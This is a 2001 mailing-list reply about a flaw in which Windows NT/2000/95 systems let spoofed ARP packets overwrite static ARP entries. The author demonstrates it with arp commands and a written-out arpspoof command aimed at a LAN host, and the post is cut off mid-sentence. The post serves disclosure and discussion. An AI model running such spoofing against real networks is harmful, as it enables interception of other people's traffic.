Vulnerability Development mailing list archives

Re: ARP hole in Windows NT/2000

From: Keith Simonsen <bangel () elite net>
Date: Sat, 24 Nov 2001 07:39:18 -0800

Hello,

I came across this problem awhile back too... the main point I think is he
used "arp -s" which should create a permanent entry in the arp table.

ettercap probably floods the lan with gratuitous arp requests, so it can steal
the gateway's ip address. If NT had a functional arp cache, the entry set
with arp -s should not be changed.

{root@blak 10:07am} ~# arp -S 192.168.1.1 0:60:8:af:8c:e4
{root@blak 10:07am} ~# arp -an
? (192.168.1.1) at 0:60:8:af:8c:e4 permanent [ethernet]

I ran arpspoof (from dsniff pkg) for awhile against that host
{bangel@nomad 11:17am} /home/bangel# arpspoof -i ep0 -t 192.168.1.2 nomad
from another machine, the arp entry never changed, which is how it should
be.

I walked up stairs to a windows95 machine, did this:
C:\>arp -s 192.168.1.1 00-60-08-af-8c-e4
C:\>arp -a
Interface: 192.168.1.3 on Interface 2
  Internet Address      Physical Address      Type
  192.168.1.1           00-60-08-af-8c-e4     static

I then ran arpspoof against the 95 machine. The supposedly static entry
changed immediately to the machine i was trying to spoof.

C:\>arp -a
Interface: 192.168.1.3 on Interface 2
  Internet Address      Physical Address      Type
  192.168.1.1           00-a0-c9-89-16-4a     static

I repeated the same thing on win2000 SP1 I had on a laptop here... Same
results.

Awhile back, a friend and I tested many platforms against this bug, using
both spoofed arp replies and spoofed gratuitious arp requests. Unfortunately
I can't find our results, but I do remember that all versions of Windows
we tested were vulnerable to changing static arp entries w/ spoofed arp